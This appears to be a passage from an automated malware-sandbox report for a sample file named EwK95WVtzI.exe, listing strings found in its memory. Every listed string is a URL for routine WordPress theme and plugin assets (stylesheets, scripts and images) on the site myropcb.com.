                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.4.
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
